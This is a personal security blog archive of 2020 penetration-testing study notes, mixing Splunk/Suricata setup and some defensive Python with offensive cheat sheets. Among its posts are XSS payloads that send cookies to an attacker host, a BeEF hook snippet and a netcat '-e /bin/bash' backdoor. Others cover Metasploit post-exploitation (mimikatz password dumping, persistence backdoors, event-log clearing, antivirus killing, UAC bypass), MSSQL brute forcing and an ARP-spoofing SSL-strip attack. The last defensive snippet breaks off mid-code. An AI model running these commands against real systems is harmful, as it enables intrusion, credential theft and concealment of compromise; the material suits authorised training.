Thursday, November 26, 2020

[Splunk][Suricata][Syslog] Enable Syslog on Suricata for Splunk (updated on 20201126)

 [For Suricata side:]

# cd /etc/suricata/

# cp ./suricata.yaml ./suricata_with_syslog.yaml

# vi ./suricata_with_syslog.yaml

Make sure that the following lines exist:

  - syslog:

      enabled: yes

      identity: "suricata"

      facility: local5

      level: Info

:wq

# killall -9 suricata

# suricata -c /etc/suricata/suricata_with_syslog.yaml -i wlan0 -D

# vi /etc/rsyslog.conf

Add the following line to the file (P.S.: 192.168.0.253 is the Splunk server, 888 is the TCP port it listens on, and the double "@@" tells rsyslog to forward over TCP rather than UDP):

*.*                             @@192.168.0.253:888

:wq

# /etc/init.d/rsyslog restart



[For Splunk side:]

1) Go to "Settings"->"Data Inputs"

2) Go to "TCP"->"Add new"

3) Enter "888"->Click "Next >"

4) "Select Source Type"->"Operating System"->"syslog"->"Review >"

5) "Submit >"

6) "Start Searching"
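Once the alerts arrive in Splunk, the first thing to build is a field extraction. The Python script below is an added example, not part of the original post and not Suricata's or Splunk's own code, showing what that extraction has to pull out of a forwarded line. The three log lines are constructed; the alert layout is assumed to be Suricata's default syslog text ("[gid:sid:rev] msg [Classification: ...] [Priority: N] {PROTO} src:port -> dst:port") behind the rsyslog header, and because the `*.*` rule forwards every facility, the parser also has to skip non-Suricata lines.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Constructed sample of what rsyslog forwards to Splunk once Suricata's syslog
# output is enabled with identity "suricata". The alert text layout is assumed
# to be Suricata's default one; the third line is an unrelated sshd message
# that the "*.*" rsyslog rule forwards as well.
SAMPLE_LINES = [
    "Nov 26 10:15:32 sensor suricata[1234]: [1:2100498:7] GPL ATTACK_RESPONSE "
    "id check returned root [Classification: Potentially Bad Traffic] "
    "[Priority: 2] {TCP} 192.168.0.10:80 -> 192.168.0.253:51234",
    "Nov 26 10:15:33 sensor suricata[1234]: [1:2001219:20] ET SCAN Potential "
    "SSH Scan [Classification: Attempted Information Leak] [Priority: 2] "
    "{TCP} 10.0.0.5:41022 -> 192.168.0.251:22",
    "Nov 26 10:15:34 sensor sshd[999]: Accepted publickey for root from "
    "192.168.0.2 port 50000 ssh2",
]

# syslog header, then "[gid:sid:rev] msg [Classification: c] [Priority: p]
# {PROTO} src:port -> dst:port" (IPv4 addresses only)
ALERT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) suricata\[(?P<pid>\d+)\]: "
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] (?P<msg>.+?) "
    r"\[Classification: (?P<classification>[^\]]+)\] \[Priority: (?P<priority>\d+)\] "
    r"\{(?P<proto>[A-Z0-9]+)\} (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


@dataclass
class Alert:
    timestamp: str
    sensor: str
    gid: int
    sid: int
    rev: int
    msg: str
    classification: str
    priority: int
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def parse_alert(line: str) -> Optional[Alert]:
    """Return an Alert for a Suricata alert line, or None for anything else."""
    m = ALERT_RE.match(line.strip())
    if m is None:
        return None
    g = m.groupdict()
    return Alert(g["ts"], g["host"], int(g["gid"]), int(g["sid"]), int(g["rev"]),
                 g["msg"], g["classification"], int(g["priority"]), g["proto"],
                 g["src"], int(g["sport"]), g["dst"], int(g["dport"]))


def parse_feed(lines: Iterable[str]) -> Tuple[List[Alert], int]:
    """Parse a whole feed; returns (alerts, number of lines that were not alerts)."""
    alerts: List[Alert] = []
    skipped = 0
    for line in lines:
        alert = parse_alert(line)
        if alert is None:
            skipped += 1
        else:
            alerts.append(alert)
    return alerts, skipped


def high_priority(alerts: Iterable[Alert], max_priority: int = 2) -> List[Alert]:
    """Suricata priority 1 is the most severe, so keep alerts at or below the threshold."""
    return [a for a in alerts if a.priority <= max_priority]


def count_by_signature(alerts: Iterable[Alert]) -> List[Tuple[str, int]]:
    """Equivalent of a Splunk 'stats count by msg', most frequent first."""
    return Counter(a.msg for a in alerts).most_common()


if __name__ == "__main__":
    parsed, other = parse_feed(SAMPLE_LINES)
    print(f"{len(parsed)} alerts parsed, {other} non-alert lines skipped")
    for a in high_priority(parsed):
        print(f"sid={a.sid} prio={a.priority} {a.proto} {a.src_ip}:{a.src_port} -> "
              f"{a.dst_ip}:{a.dst_port} {a.msg}")
    for msg, n in count_by_signature(parsed):
        print(f"{n:4d}  {msg}")
```

The same groups map one-to-one onto a Splunk `rex` field extraction; the regex is written with named groups so it can be pasted into one with only the Python-specific `(?P<name>...)` spelling changed.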

Wednesday, November 25, 2020

[Splunk] Install and Launch Splunk at Ubuntu (updated on 20201125)

 1) Download Splunk TAR file, splunk-8.1.0.1-24fd52428b5a-Linux-x86_64.tgz, to the folder, /usr/local/sbin/.


2) Execute the following commands:

# cd /usr/local/sbin

# tar -zxvf ./splunk-8.1.0.1-24fd52428b5a-Linux-x86_64.tgz -C /opt


3) Launch Splunk by executing the command below:

# /opt/splunk/bin/splunk start


4) The first time you launch Splunk, press SPACE repeatedly to scroll to the end of the Terms of Service, then type y and press ENTER to accept them.


5) After that, create an administrator account by following the prompts.


6) To have Splunk start at boot, create a systemd unit file with the following commands:

# vi /etc/systemd/system/splunk.service

[Unit]

Description=Splunk server

[Service]

ExecStart=/opt/splunk/bin/splunk start

KillMode=process

[Install]

WantedBy=multi-user.target

Alias=splunk.service

:wq


7) Enable the service at boot and start it now:

# systemctl enable splunk.service

# systemctl start splunk.service


8) Finally, open http://IP:8000/ in a web browser.

Wednesday, November 18, 2020

[Kali][Linux]Some useful tools in Kali Linux used as your primary OS

 To have Chinese Input Methods:

# apt-get install ibus ibus-pinyin


To have a better SSH client:

# apt-get install putty


To have a better file transfer tool (support FTP and SFTP):

# apt-get install filezilla


To have the screenshot function:

# apt-get install gnome-screenshot


To monitor the status of each network adapter:

# apt-get install iptraf


To better monitor the system resource:

# apt-get install htop


To have Chrome:

# apt-get install chromium


To download via BitTorrent:

# apt-get install transmission-gtk


To read/write Office files and PDF:

# apt-get install libreoffice


Friday, November 13, 2020

[eCPPT][BeEF][XSS]BeEF-XSS Installation Playbook updated on Nov 13, 2020

 [Installation:]

# cd /usr/local/sbin

# git clone https://github.com/beefproject/beef

# cd beef

# ./install

After the installation is done, change the default password by:

# vi ./config.yaml

Modify 'passwd: "beef"' to your own password before saving the file and exiting.

# ./update-geoipdb


[Execution:]

# /usr/local/sbin/beef/beef

Then browse "http://127.0.0.1:3000/ui/panel" to manage BeEF. Bear in mind that the Hook URL is "http://YOUR_IP:3000/hook.js". The hook could be used in such a snippet as shown below:

<script src="http://YOUR_IP:3000/hook.js"></script>

Thursday, November 12, 2020

[eCPPT][sqlmap]Enhance SQLMap's Success Rate

Raising the "--level" and "--risk" parameters makes sqlmap launch more test cases, which increases the chance of a successful scan.


For instance, below is an ordinary scanning command:

# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --dbs


In terms of the command above, the chance of getting any useful information may not be high. However, if you try:

# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --level 3 --risk 3 --dbs


You may get what you want directly.


Again, the parameter "--level" (ranges from 1 to 5) defines the number of checks/payloads to be performed, and the parameter "--risk" (ranges from 1 to 3) reflects the type of payloads being used.

Monday, November 9, 2020

[eCPPT][SNMP]Get readable information through SNMP

Suppose you already have the community string and want to gather readable information about the target; follow the example shown below:


# apt-get update && apt-get install snmpenum


# snmpenum --help

Usage: snmpenum <IP-address> <community> <configfile>


# ll /usr/share/snmpenum/

total 44

drwxr-xr-x   2 root root  4096 Nov  9 23:28 .

drwxr-xr-x 470 root root 20480 Nov  9 23:28 ..

-rw-r--r--   1 root root   554 Mar 26  2019 cisco.txt

-rw-r--r--   1 root root   347 Mar 26  2019 linux.txt

-rw-r--r--   1 root root  1103 Apr 28  2003 README.txt

-rwxr-xr-x   1 root root  3179 Mar 26  2019 snmpenum.pl

-rw-r--r--   1 root root   512 Mar 26  2019 windows.txt


# snmpenum 10.10.10.5 private windows.txt

...

----------------------------------------

USERS

----------------------------------------


Guest

admin

Administrator

...

Wednesday, October 28, 2020

Fundamental Notes for Powershell

Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/?view=powershell-5.1


<Execute Powershell script in Regular CMD:>

Example #1: Run a Powershell script in CMD:

cmd > powershell -command "& 'C:\foobar.ps1'"

Example #2: Run a PowerShell command in CMD:

cmd > powershell -command " get-process "


<Get Help Information:>

PS > Get-Help [COMMAND]

Example:

PS > Get-Help Get-Help

PS > Get-Help Get-Command


<Get Cmdlets List:>

PS > Get-Command 


<Search Cmdlets:>

PS > Get-Command -Name [PATTERN]

Example:

PS > Get-Command -Name *firewall*


<Get Process Information:>

PS > Get-Process chrome, firefox | Sort-Object -Unique | Format-List Path,Id


<List All Alias Cmdlets:>

PS > Get-Alias -Definition [COMMAND]

Example:

PS > Get-Alias -Definition Get-ChildItem


<Query WMI by using Get-WmiObject:>

Example #1: Query the process list

PS > Get-WmiObject -Class Win32_Process

Example #2: Query the service list of a remote computer

PS > Get-WmiObject -Class Win32_Service -ComputerName 10.1.4.62

Example #3: Query information with a WQL query

PS > Get-WmiObject -Query "select * from win32_service where name='WinRM'" -ComputerName Server01, Server02 | Format-List -Property PSComputerName, Name, ExitCode, Name, ProcessID, StartMode, State, Status

Saturday, October 24, 2020

Information Security Journals

 Referred from https://www.cs.sjsu.edu/~stamp/securityJournals.html

Author: Mark Stamp

His email: mark.stamp@sjsu.edu

Sunday, August 23, 2020

[XSS]Two key test cases against Cross Site Scripting

 Stealing Cookie:

"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>

<script>var i = new Image();i.src="http://hacker/log.php?q="+document.cookie;</script>


Work with Browser Autopwn:

<IFRAME src='http://hacker'><\/IFRAME>


For more information, refer to my project at "https://github.com/d3m0n4l3x/alexfuzz".

Friday, August 21, 2020

[eCPPT][XSS][metasploit][Browser][Autopwn]Verify Browser Security through Metasploit

 1) Enter Metasploit msfconsole:

# msfconsole


2) Select Browser Autopwn:

msf5 > use auxiliary/server/browser_autopwn

OR

msf5 > use auxiliary/server/browser_autopwn2


3) Set up corresponding settings:

msf5 auxiliary(server/browser_autopwn) > set LHOST 192.168.0.XX /*P.S.: 192.168.0.XX is the IP address of this machine.*/

msf5 auxiliary(server/browser_autopwn) > set SRVPORT 80

msf5 auxiliary(server/browser_autopwn) > set URIPATH /


4) Start the malicious web server:

msf5 auxiliary(server/browser_autopwn) > exploit


5) Metasploit then would show you a "Local IP" URL, which should be browsed by the tested machine, as shown below:

[*] --- Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.0.XX:80/ /*P.S.: http://192.168.0.XX:80/ is the URL needed to be browsed by the tested machine.*/

[*] Server started.


6) If the tested machine is vulnerable, a meterpreter should be showing up shortly.

Wednesday, August 19, 2020

[eCPPT][XSS]Test Cases for DOM-based Cross Site Scripting

 Here are some test cases for DOM-based Cross Site Scripting:

"><img src="aaa" onerror="alert(document.cookie)">

"><svg/onload="alert(document.cookie)">

"><svg/onload="document.forms[0].action='//192.168.0.253/get.php'">

Tuesday, August 18, 2020

[Phishing]Detect and Respond to Phishing Emails

 Detection:

- Utilize Threat Intelligence information to confirm if it is a phishing email.

- Phone the sender to confirm if it is a phishing email.


Response:

- Report to Federal Trade Commission at spam@uce.gov.

- Report to the finance institution being impersonated.

- Update the detection and mitigation rules on Email Security system.

Monday, August 17, 2020

[eCPPT][XSS]Mitigation of Cross Site Scripting risk

 1) Set the following attributes on the session cookie:

expires=

domain=

path=

secure

HttpOnly

2) Store only an opaque Session ID / Token in the cookie, never other meaningful data.

3) Validate user input against a whitelist (allowlist).

4) Use encoding functions such as HtmlEncode to neutralize dangerous characters (e.g. "<" and ">") in the output.

TIPS: AntiXSS libraries can make mitigating Cross Site Scripting risk considerably easier.
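As an added example (not from the original post), the Python snippet below puts points 1) to 4) together: an opaque random session token, a Set-Cookie value carrying the listed attributes, an allowlist check for a structured field, and HtmlEncode-style output encoding for free text, with the vulnerable rendering beside the hardened one. The username policy, the cookie name `sid`, the domain `example.test` and the fixed clock `EXAMPLE_NOW` are assumptions made for the example.

```python
import html
import re
import secrets
from datetime import datetime, timedelta, timezone
from typing import Optional

# Allowlist for a structured field (assumed policy): letters, digits, "_", ".", "-", 3 to 32 chars.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")
# The session cookie may only carry an opaque random token, never user data.
SESSION_TOKEN_RE = re.compile(r"[0-9a-f]{32,128}")
# Constructed fixed clock so the expires= value in the example is reproducible.
EXAMPLE_NOW = datetime(2020, 11, 26, 0, 0, tzinfo=timezone.utc)


def new_session_token() -> str:
    """256 random bits from the OS CSPRNG, hex-encoded (64 characters)."""
    return secrets.token_hex(32)


def session_cookie_header(token: str, domain: str, path: str = "/",
                          lifetime: timedelta = timedelta(hours=8),
                          now: Optional[datetime] = None) -> str:
    """Set-Cookie value with expires=, domain=, path=, secure and HttpOnly (point 1)."""
    if not SESSION_TOKEN_RE.fullmatch(token):
        raise ValueError("session cookie must hold an opaque random token (point 2)")
    now = now or datetime.now(timezone.utc)
    expires = (now + lifetime).strftime("%a, %d %b %Y %H:%M:%S GMT")
    return (f"sid={token}; expires={expires}; domain={domain}; path={path}; "
            "secure; HttpOnly")


def validate_username(value: str) -> bool:
    """Whitelist validation (point 3): anything outside the pattern is rejected."""
    return USERNAME_RE.fullmatch(value) is not None


def html_encode(value: str) -> str:
    """HtmlEncode equivalent (point 4): <, >, &, " and ' become entities."""
    return html.escape(value, quote=True)


def render_profile_unsafe(username: str, bio: str) -> str:
    """Vulnerable: user-controlled strings are interpolated straight into HTML."""
    return f"<h1>{username}</h1><p>{bio}</p>"


def render_profile(username: str, bio: str) -> str:
    """Hardened: allowlist the structured field, encode the free-text field,
    and encode the username as well for defence in depth."""
    if not validate_username(username):
        raise ValueError("username rejected by allowlist")
    return f"<h1>{html_encode(username)}</h1><p>{html_encode(bio)}</p>"


if __name__ == "__main__":
    print(session_cookie_header(new_session_token(), "example.test"))
    payload = "<script>alert(document.cookie)</script>"
    print(render_profile_unsafe("alice", payload))   # script tag survives
    print(render_profile("alice", payload))          # script tag becomes inert text
```

The allowlist and the encoder are deliberately separate layers: the allowlist rejects inputs that have no legitimate shape, while encoding protects fields such as a biography that must accept arbitrary text.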

Sunday, August 16, 2020

[Netcat][Ncat][Nmap][eCPPT]netcat cheat sheet

 Reference: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf


This cheat sheet is based on the rewritten version of Netcat, namely ncat, which is part of Nmap.


Port Scan:

# ncat -z -w1 -n -v 192.168.0.251 22


Socket Client:

# ncat -nvv 192.168.0.251 443


Socket Server:

# ncat -vv -l -p 443


Keep-alive Socket Server (keeps listening after a client disconnects):

In Windows:

cmd > nc -L -p 443

In Linux/Unix:

# ncat -k -l -p 443


Access control: allow or deny specific clients:

Only allow 192.168.0.253 to connect to the socket:

# ncat --allow 192.168.0.253 -vv -l -p 443

Deny only 192.168.0.251 from connecting to the socket:

# ncat --deny 192.168.0.251 -vv -l -p 443


Backdoor Server:

# ncat -l -p 888 -e /bin/bash


File Transferring:

Recipient / Server:

# ncat -l -p 8888 > /tmp/test.txt

Sender / Client:

# ncat -w3 -n 192.168.0.253 8888 < ./test.txt


Saturday, August 15, 2020

[Netcat]Keep Netcat sockets alive to continuously listen

 The examples below demonstrate how to create Netcat sockets continuously listening in Windows and Linux/Unix, respectively.


In Windows:

cmd > nc -vv -L -p 443


In Linux/Unix:

# ncat -vv -k -l -p 443

Friday, August 7, 2020

[ICSI_CPT]A walkthrough of a pentest against MS SQL Server

 First confirm if MS SQL Server is running on the default port.

# nmap -Pn -sS -p 1433 192.168.0.25


After that, try to ascertain the details of the MS SQL Server.

# nmap -v -p 1433 --script=ms-sql-info 192.168.0.25


Once the details of the authentication method are known, Hydra can be used to brute-force the password.

# hydra -s 1433 -l sa -P /usr/share/wordlists/sqlmap.txt


Through Metasploit, let us complete the final step of the exploitation.

# msfconsole

msf > use exploit/windows/mssql/mssql_payload

msf > set payload windows/meterpreter/reverse_tcp

msf > set LHOST XXX.XXX.XXX.XXX

msf > set RHOST XXX.XXX.XXX.XXX

msf > set USERNAME sa

msf > set PASSWORD XXXXX

msf > run

Thursday, August 6, 2020

[eCPPT]Identify Web Application Framework

1) Through HTTP Header
Such as "X-Content-Encoded-By: Joomla! 2.5"

2) Through Web Content
Such as "Copyright 2015 vBulletin Solutions."

3) Through HTTP Tags
e.g. "<meta name="generator" content="WordPress 4.2-beta3-31946" />"

4) Through URL
e.g. "index.php?option=%component_name%&task=%task_value%"
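The four indicator types above can be checked against a captured response in one pass. Below is an added Python example (not part of the original post) that takes the request URL, the response headers and the body and reports every product name and version disclosed through them; run against your own site, it doubles as a version-leakage audit. The sample URL, headers and body are constructed and deliberately combine all four indicator types; the `com_` component prefix used to recognise the Joomla-style URL layout is an assumption based on that framework's conventional URLs.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Finding:
    source: str            # "header", "meta", "content" or "url"
    product: str
    version: Optional[str]
    evidence: str          # the exact text that gave it away


# 1) HTTP headers that commonly carry a product name and version.
DISCLOSING_HEADERS = ("X-Content-Encoded-By", "X-Powered-By", "Server", "X-Generator")
# "Joomla! 2.5", "Apache/2.4.41", "PHP/7.4.3", "Microsoft-IIS/10.0", or a bare "Apache"
HEADER_VALUE_RE = re.compile(r"^(?P<product>[A-Za-z][A-Za-z!.-]*)[/ ]?(?P<version>\d[\w.-]*)?")
# 2) Copyright notices naming the product in the page content.
COPYRIGHT_RE = re.compile(r"Copyright\s+\d{4}\s+(?P<product>[A-Za-z]+)", re.I)
# 3) <meta name="generator"> tags.
META_GENERATOR_RE = re.compile(
    r'<meta\s+name="generator"\s+content="(?P<product>[A-Za-z!]+)\s*(?P<version>[^"]*)"', re.I)
# 4) URL layout characteristic of a framework (assumption: Joomla's com_* component parameter).
JOOMLA_URL_RE = re.compile(r"index\.php\?option=com_[a-z0-9_]+", re.I)

# Constructed sample response that carries all four indicator types at once.
SAMPLE_URL = "http://www.example.test/index.php?option=com_content&task=view"
SAMPLE_HEADERS = {"Server": "Apache/2.4.41", "X-Content-Encoded-By": "Joomla! 2.5"}
SAMPLE_BODY = (
    '<html><head><meta name="generator" content="WordPress 4.2-beta3-31946" /></head>'
    "<body><footer>Copyright 2015 vBulletin Solutions.</footer></body></html>"
)


def fingerprint(url: str, headers: Dict[str, str], body: str) -> List[Finding]:
    """Collect every framework/product indicator from one HTTP response."""
    findings: List[Finding] = []
    lower = {k.lower(): v for k, v in headers.items()}    # header names are case-insensitive
    for name in DISCLOSING_HEADERS:
        value = lower.get(name.lower())
        if value:
            m = HEADER_VALUE_RE.match(value)
            if m:
                findings.append(Finding("header", m.group("product"), m.group("version"),
                                        f"{name}: {value}"))
    for m in META_GENERATOR_RE.finditer(body):
        findings.append(Finding("meta", m.group("product"), m.group("version") or None, m.group(0)))
    for m in COPYRIGHT_RE.finditer(body):
        findings.append(Finding("content", m.group("product"), None, m.group(0)))
    if JOOMLA_URL_RE.search(url):
        findings.append(Finding("url", "Joomla", None, url))
    return findings


def version_disclosures(findings: List[Finding]) -> List[Finding]:
    """Only the findings that leak an exact version, the ones worth fixing first."""
    return [f for f in findings if f.version]


if __name__ == "__main__":
    for f in fingerprint(SAMPLE_URL, SAMPLE_HEADERS, SAMPLE_BODY):
        print(f"{f.source:8s} {f.product:12s} {f.version or '-':18s} {f.evidence}")
```

A product name alone narrows the attack surface, but an exact version is what lets an attacker (or your own vulnerability scanner) pick a specific exploit, so `version_disclosures` is the list to hand to whoever owns the server configuration.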

Monday, August 3, 2020

[ICSI_CPT]Mirror Website

#!/usr/bin/perl
# Mirror a website with wget and write its directory structure to a text file with tree.
use strict;
use warnings;
use Cwd;
$| = 1;

# Abort unless the given tool is on the PATH.
sub check_tool {
    my ($tool, $name) = @_;
    my $result = `which $tool 2>/dev/null`;
    if (length($result) == 0) {
        die "Please install $name.\n";
    }
    return;
}

# main:
check_tool('wget', 'Wget');
check_tool('tree', 'Tree');
print("URL (e.g. \"https://192.168.0.22:5001/\" OR \"http://www.microsoft.com/\"): ");
my $url = <STDIN>;
chomp($url);    # chomp strips only the newline; chop would eat the last character when no newline is present
my ($protocol, $server);
if ($url =~ /(.*):\/\/(.*)\//) {
    $protocol = $1;
    $server = $2;
} else {
    die "The format of $url is problematic!\nThe correct format should be like \"https://192.168.0.22:5001/\" OR \"http://www.microsoft.com/\".\n";
}
# --protocol-directories places the mirror under ./<protocol>/<server>/
system("wget --protocol-directories -r $url > /dev/null 2>&1");
my $current_path = getcwd();
my $path = "$current_path/$protocol/$server/";
print("$url has been downloaded at $path.\n");
my $structure_file = "$current_path/${protocol}_${server}_structure.txt";
system("tree $path > $structure_file");
print("The STRUCTURE file has been generated at $structure_file.\n");

[ICSI_CPT][Spider]Crawl a website structure via wget

Suppose the target is http://192.168.0.253:5001/, you can mirror the website by executing the following command:
# wget --protocol-directories -r http://192.168.0.253:5001/

The command below shows the directory structure of the mirrored website:
# tree ./http/192.168.0.253:5001/

The following command finds the downloaded pages that contain a keyword, "password" in this example:
# grep -nR password ./http/192.168.0.253:5001/

Saturday, August 1, 2020

[ICSI_CPT][Brute Force]Multi Brute Force attacks performed by Nmap

Suppose the target is 192.168.0.10 in this case:
# nmap -Pn -T4 -F -sT -sU --script ftp-anon,ftp-brute,telnet-brute,ssh-brute,rexec-brute,smtp-brute,smb-brute,snmp-brute 192.168.0.10

[ICSI_CPT]Testing the Finger service for User Enumeration on Unix-like systems

Suppose the target is 192.168.0.10:
# finger @192.168.0.10
# finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10
# finger 0@192.168.0.10
# finger .@192.168.0.10
# finger **@192.168.0.10
# finger user@192.168.0.10
# finger test@192.168.0.10

Friday, July 31, 2020

[ICSI_CPT][metasploit] Privilege Escalation by disabling UAC

meterpreter > getsystem
Failed....

meterpreter > background

msf > use exploit/windows/local/bypassuac

msf > set session X

msf > run

meterpreter > getsystem
Successful...

[ICSI_CPT]Check Windows Patches and Updates

Check the status of system patches and updates via CMD command:
cmd > wmic qfe get Caption,Description,HotFixID,InstalledOn

[certificate]ISO/IEC27001 Lead Auditor-2


Thursday, July 30, 2020

[eCPPT]Search sub-domains of a Top Level Domain

1) Google:
site:microsoft.com

2) Zone Transfer:
# host -l microsoft.com soa.microsoft.com

3) Shodan & Censys:
Shodan: search microsoft.com
Censys: search certificates related to microsoft.com

4) DNS Enumeration:
# dnsenum microsoft.com
# dnsrecon -d microsoft.com
# fierce -dns microsoft.com

Wednesday, July 29, 2020

[eCPPT]Detect Web services and their versions

1) whatweb
# whatweb http://www.microsoft.com/
# whatweb -v http://www.microsoft.com/

2) wappalyzer
It is a browser extension available for Firefox and Chrome.

Sunday, July 26, 2020

[eCPPT][ICSI_CPT][Metasploit]Metasploit Cheat Sheet

Boot up Msfconsole:
# service postgresql start
# msfdb init
# msfconsole
msf > db_status

Search appropriate modules (some examples):
msf > search platform:Windows
msf > search platform:"Windows 7"
msf > search name:mysql
msf > search path:scada
msf > search author:jsmith
msf > search cve:2010-0249
msf > search cve:2011 author:jsmith platform:linux

Exploitation Procedure:
search -> use -> show options -> set -> show payloads -> set payload -> run

Migrate to another process within Meterpreter for stability (P.S.: suppose the PID of davcdata.exe is 2732):
meterpreter > ps
 ...
 2660  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2732  604   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.

A simple privilege escalation attempt (P.S.: for Windows victims only):
meterpreter > getsystem

Find appropriate privilege escalation exploits (P.S.: suppose the existing session is 1):
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run

Privilege Escalation within Meterpreter (P.S.: suppose the MS10-015 vulnerability applies and the existing session is 2):
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2

Retrieve passwords via Meterpreter:
meterpreter > load mimikatz
meterpreter > mimikatz_command -f sekurlsa::searchPassword
meterpreter > kerberos

Install a backdoor agent via Meterpreter for a persistent access:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.0.224
Here, "-U" makes the backdoor agent execute automatically (at user logon), "-i 5" makes it retry the connection every 5 seconds if it fails, "-p 443" defines TCP 443 as the remote port the backdoor server listens on, and "-r 192.168.0.224" specifies the IP address of the backdoor server, which is 192.168.0.224 in this case.

Clean Windows Event Logs through Meterpreter:
meterpreter > clearev

Post-exploitation commands(for Windows):
meterpreter > sysinfo
meterpreter > getuid
meterpreter > run post/windows/manage/migrate NAME=explorer.exe
meterpreter > run post/windows/manage/killav
meterpreter > run post/windows/gather/checkvm
meterpreter > run post/windows/manage/autoroute
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_ie
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/credentials/credentials_collector
meterpreter > run post/windows/gather/screen_spy
meterpreter > run post/windows/gather/enum_domain
meterpreter > run post/windows/gather/win_privs
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/multi/recon/local_exploit_suggester

Post-exploitation commands(for Linux):
meterpreter > sysinfo
meterpreter > run post/linux/gather/enum_configs
meterpreter > run post/linux/gather/enum_system
meterpreter > run post/linux/gather/enum_users_history
meterpreter > run post/multi/recon/local_exploit_suggester

AutoRun Post-exploitation commands:
1) Save the commands above into an rc file located at /root/autorun.rc
2) Enter the handler view, specify the corresponding options, and execute the following command:
msf handler > set AutoRunScript multi_console_command -rc /root/autorun.rc
msf handler > run

Post-exploitation for further exploration:
1) ARP Scan (PS: suppose the target network is 10.32.120.0/24):
meterpreter > run arp_scanner -r 10.32.120.0/24
2) Use the compromised PC as a router/jumpbox (PS: suppose the target network is 192.168.2.0/24, and the meterpreter session id is 1):
meterpreter > background
msf > route add 192.168.2.0 255.255.255.0 1
The updated routing table can be confirmed by executing the following command:
msf > route print
The target network can be scanned through the jumpbox now by executing the commands below:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 192.168.2.1
msf > set PORTS 1-1024
msf > run

Thursday, July 23, 2020

[ICSI_CPT] Host Discovery

Passive Discovery:
# netdiscover -p

Active Discovery:
# netdiscover -r 192.168.1.0/24
# nmap -sP 192.168.1.0/24

[ICSI_CPT][DNS] DNS Discovery

# host -l microsoft.com soa.microsoft.com
# dnsenum microsoft.com
# dnsrecon -d microsoft.com

[ICSI_CPT][eCPPT][Threat Intelligence] Shodan Hacking

Reference: https://developer.shodan.io/api
Update Date: July 23, 2020

data:
OLD IIS
"iis/5.0"
microsoft.com

city:
city:London
city:Singapore

country:
country:SG
country:US

geo [An example below: Devices within a 50km radius of San Diego (32.8,-117)]:
geo:32.8,-117,50

hostname:
hostname:test

net:
net:216.219.0.0/16

ip:
ip:8.8.4.4
ip:1.1.1.1

os:
os:windows
os:"windows 2003"

port:
port:445
port:135

before/after [An example below: Apache servers located in China and seen between March 22, 2010 and June 4, 2010]:
apache country:CN after:22/03/2010 before:04/06/2010

device:
device:router
device:webcam

Sunday, July 19, 2020

OS Configuration Security Review | Local Vulnerability Scan

[Windows:]

Policy Analyzer (Microsoft Security Compliance Toolkit)
https://www.microsoft.com/en-us/download/details.aspx?id=55319

Microsoft Baseline Security Analyzer (MBSA)
https://www.microsoft.com/en-us/download/details.aspx?id=19892


[Linux:]

OpenSCAP
https://www.open-scap.org/

Lynis
https://cisofy.com/lynis/

Saturday, July 18, 2020

[eCPPT][SSL][MITM] SSL Strip Attack

Comment: The following experimentation works well with Kali 2018.1. The reason why I don't use the newest version, namely 2020.X, is that the newest version has no sslstrip by default, and it is tough to install python-twisted-web, which sslstrip requires.

Running (In this case, 192.168.0.19 is the victim, 192.168.0.1 is the gateway, and TCP8080 is the listening port) :
# sysctl net.ipv4.ip_forward=1
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# sslstrip -a -f -l 8080 -w /root/sslstrip.log
Open a new terminal and type:
# arpspoof -i eth0 -t 192.168.0.19 -r 192.168.0.1

Harvest:
Open a new terminal and type:
# tail -n 30 -f /root/sslstrip.log

P.S.: This experimentation only succeeds when the victim's browser does not support HSTS.
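Since the attack only works while the browser holds no HSTS policy for the site, the defender's half of this post is making sure the site actually sends one. The Python check below is an added example (not part of the original post): it parses the Strict-Transport-Security header and reports the weaknesses that leave a downgrade window open. The three header sets are constructed, and the one-year minimum for max-age is an assumed policy threshold.

```python
from typing import Dict, List, Optional

ONE_YEAR = 31536000   # assumed minimum max-age policy, in seconds

# Constructed response header sets for three servers.
GOOD_HEADERS = {"Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload"}
MISSING_HEADERS = {"Server": "nginx", "Content-Type": "text/html"}
WEAK_HEADERS = {"Strict-Transport-Security": "max-age=300"}


def parse_hsts(value: str) -> Dict[str, Optional[str]]:
    """Split 'max-age=300; includeSubDomains' into {'max-age': '300', 'includesubdomains': None}."""
    directives: Dict[str, Optional[str]] = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, sep, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"') if sep else None
    return directives
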